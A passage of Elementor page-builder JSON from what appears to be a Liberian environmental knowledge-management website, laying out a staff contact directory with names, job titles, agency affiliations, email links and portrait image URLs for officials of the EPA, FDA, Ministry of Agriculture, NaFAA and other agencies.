Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br 